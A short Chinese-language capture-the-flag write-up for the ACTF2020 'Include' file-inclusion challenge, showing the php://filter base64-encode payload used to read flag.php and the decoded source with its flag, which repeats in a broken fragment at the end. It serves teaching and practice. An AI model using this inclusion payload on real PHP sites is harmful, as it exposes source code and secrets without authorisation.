[ACTF2020 新生赛]Include 1
文件包含漏洞
进入靶机
发现需要点击跳转,点击
上面显示flag.php,那么flag应该放到php源码了,这里采用的php伪协议跳转的
可以采用php://filter协议
固定格式:xxx.php?xxx=php://filter/convert.base64-encode/resource=xxx.php
输入php://filter/convert.base64-encode/resource=flag.php
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wDvo7kha-1678163650681)(G:\知了堂\mackdown\image-20230307115433858.png)]
base解码可得
<?php echo "Can you find out the flag?"; //flag{0afb9090-c223-4b21-a966-ef7ed5d1a552} 223-4b21-a966-ef7ed5d1a552}